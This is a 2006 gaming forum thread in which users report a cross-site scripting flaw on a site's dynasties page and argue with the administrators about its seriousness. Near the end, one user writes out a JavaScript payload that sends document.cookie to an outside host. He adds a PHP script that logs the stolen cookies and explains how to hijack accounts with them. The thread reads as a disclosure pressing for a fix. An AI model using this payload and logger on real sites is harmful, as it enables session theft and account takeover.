Yarold
Author
Message
jeremy02
Gamer God
Joined: 27 Nov 2003 Posts: 300 Location: Giving up
Posted: Fri Jul 07, 2006 12:20 pm Yarold
Anyone have any idea where Yarold is, or when he'll be online next?
Can someone view the dynasties page in IE and tell me if anything happens?
_________________ Sites I use:
Aim address updated.
TheNewestJedder
Hardcore Gamer
Joined: 12 May 2006 Posts: 24
Posted: Fri Jul 07, 2006 7:26 pm
i noticed it the past two days. every time i visit i get a windows message comes up.
jeremy02
Gamer God
Joined: 27 Nov 2003 Posts: 300 Location: Giving up
Posted: Fri Jul 07, 2006 10:15 pm
What does it say?
Basically, I could be stealing every user's account on this site who uses IE and views the dynasties page.
_________________ Sites I use:
Aim address updated.
TheNewestJedder
Hardcore Gamer
Joined: 12 May 2006 Posts: 24
Posted: Sat Jul 08, 2006 12:10 am
the message right there.
jeremy02
Gamer God
Joined: 27 Nov 2003 Posts: 300 Location: Giving up
Posted: Sat Jul 08, 2006 12:19 am
Yup, that's your cookie data.
_________________ Sites I use:
Aim address updated.
TheNewestJedder
Hardcore Gamer
Joined: 12 May 2006 Posts: 24
Posted: Sat Jul 08, 2006 12:25 am
it needs to be fixed now.
TheNewestJedder
Hardcore Gamer
Joined: 12 May 2006 Posts: 24
Posted: Sat Jul 08, 2006 12:29 am
i tried telling our good friend metaleo but it seems he is just doing nothing but ignoring me when i tried to alert him of a problem.
Metalteo
Site Admin
Helped: 14 times Joined: 12 Oct 2003 Posts: 1391
Posted: Sat Jul 08, 2006 12:53 am
Maybe I don't care.
Go ahead jeremy, make my days and do it.
Locked.
_________________
Yarold
Site Admin
Helped: 12 times Age: 38 Joined: 12 Oct 2003 Posts: 765
Posted: Tue Jul 11, 2006 8:03 pm
I was moving from warsaw to my home.
As for problem. It doesn't look urgent, but as every bug its nice to be fixed.
I'll be thankfull if someone can report this to me.
Also dont blame Metal for bugs in scripts (wich for i'm more suitable person).
Metalteo
Site Admin
Helped: 14 times Joined: 12 Oct 2003 Posts: 1391
Posted: Tue Jul 11, 2006 8:41 pm
I already did fix part of the problem. The annoying java pop-up is gone at least.
It's it minor glitch and harmless, but you're right it's nice if it gets fixed, since some feel the need to play silly games with it'
I'll send you a PM in chat to report it.
_________________
jeremy02
Gamer God
Joined: 27 Nov 2003 Posts: 300 Location: Giving up
Posted: Wed Jul 12, 2006 2:22 am
Yarold wrote:
As for problem. It doesn't look urgent
Not true. This is the same problem that before allowed me to access 100s of accounts.
You think it's safe because you now filter ' and ", but you are forgetting about String.fromCharCode.
_________________ Sites I use:
Aim address updated.
Yarold
Site Admin
Helped: 12 times Age: 38 Joined: 12 Oct 2003 Posts: 765
Posted: Wed Jul 12, 2006 1:30 pm
but you can make only popup with owns data (i think?).
jeremy02
Gamer God
Joined: 27 Nov 2003 Posts: 300 Location: Giving up
Posted: Wed Jul 12, 2006 11:21 pm
Yarold, that is why I would make the code like this.
Code:
javascript:window.location="http://www.site.com/cookie.php?c="+document.cookie
What that does is set the value "c" to the cookie from the site it's redirecting from.
Now, you make cookie.php look like this.
Code:
$cookie = $_GET['c'];
$fp = fopen("log.htm", 'w');
fwrite($fp, $cookie . "<br>");
fclose($fp);
So now that you wrote the users cookie to log.htm, you can look at it and replace your own cookie data with theirs, meaning that you will then be logged in as that user.
_________________ Sites I use:
Aim address updated.
Yarold
Site Admin
Helped: 12 times Age: 38 Joined: 12 Oct 2003 Posts: 765
Posted: Wed Jul 12, 2006 11:40 pm
hopefully fixed this one
(from 0.72 version cookie data from other ppl is not very usefull)
jeremy02
Gamer God
Joined: 27 Nov 2003 Posts: 300 Location: Giving up
Posted: Thu Jul 13, 2006 12:01 am
Well I'd check for you to see if it's still exploitable, but of course Metalteo deleted my dynasty.
EDIT:
The only time cookie data isn't useful is when you validate the session somehow.
_________________ Sites I use:
Aim address updated.